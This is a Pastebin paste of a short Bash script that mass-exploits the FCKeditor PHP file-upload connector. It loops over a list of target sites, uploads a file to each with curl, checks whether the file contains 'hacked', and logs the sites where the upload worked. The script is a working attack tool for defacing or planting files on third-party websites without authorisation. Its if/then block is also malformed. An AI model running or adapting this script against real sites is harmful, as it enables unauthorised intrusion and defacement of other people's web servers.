Advertisement
LittleJok3r

fckeditor fucker

Aug 22nd, 2019
342
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 0.51 KB | None | 0 0
  1. #!/bin/bash
  2.     # target site.com/fckeditor/filemanager/connectors/php/upload.php
  3. for url in `cat $1`; do
  4.     x=`curl -s -k "$url/fckeditor/editor/filemanager/connectors/php/upload.php?time=1566531885485&Type=File&CurrentFolder=/" -F 'NewFile=@asu.txt'`
  5.     cekshell=$(curl -s "$url/userfiles/asu.txt");
  6.     if [[ $cekshell =~ 'hacked' ]];
  7.     echo "http://$url/userfiles/asu.txt" | tee -a berhasilmaz.txt
  8.     then
  9.     echo "$url"
  10.     echo "UPLOAD OK"
  11.     else
  12.     echo "$url"
  13.     echo "UPLOAD FAILED"
  14.     fi
  15. done
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement